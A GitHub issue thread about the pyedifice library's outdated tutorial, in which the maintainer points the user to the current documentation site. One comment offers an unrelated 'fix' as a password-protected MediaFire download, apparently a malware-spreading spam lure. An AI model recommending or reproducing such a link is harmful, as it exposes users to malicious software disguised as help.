### ISSUE TITLE
Tutorial outdated and broken

### ISSUE THREAD

**Issue by jbritton-iti** [pyedifice/pyedifice#173]
I just tried the tutorial on Windows with Python 3.10

I get View deprecated use VBoxView.
I try that and no window is displayed.

I then try the next step that has
class MyApp(ed.Component)
I get edifice has no attribute Component.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by jamesdbrock** [comment]
This tutorial? https://pyedifice.github.io/tutorial.html

**Comment by jbritton-iti** [comment]
I started with the tutorial here:
https://www.pyedifice.org/tutorial

Which lists`
import edifice as ed
from edifice import Label, TextInput, View

window = View(layout="row")(  # Layout children in a row
    Label("Measurement in meters:"),
    TextInput(""),
    Label("Measurement in feet:"),
)

if __name__ == "__main__":
    ed.App(window).start()`
    
 This does not show a window.

**Comment by jbritton-iti** [comment]
I also tried this on Debian and got:
Traceback (most recent call last):
  File "/mnt/c/dev/edifice_tut/ex1.py", line 1, in <module>
    import edifice as ed
  File "/home/jbritton/proj/py310/lib/python3.9/site-packages/edifice/__init__.py", line 132, in <module>
    from ._component import Element, component, Reference
  File "/home/jbritton/proj/py310/lib/python3.9/site-packages/edifice/_component.py", line 730
    match el:
          ^
SyntaxError: invalid syntax

**Comment by jamesdbrock** [comment]
> I started with the tutorial here: https://www.pyedifice.org/tutorial
> 

Oh yeah, that is the old website. Sorry the old website is still online.

The new website is here:  https://pyedifice.github.io

**Comment by jbritton-iti** [comment]
Ok, trying the first code snippet on the new web site worked.
So, I think it is ok to close the issue.
Although perhaps the old web site should get some deprecation warning.
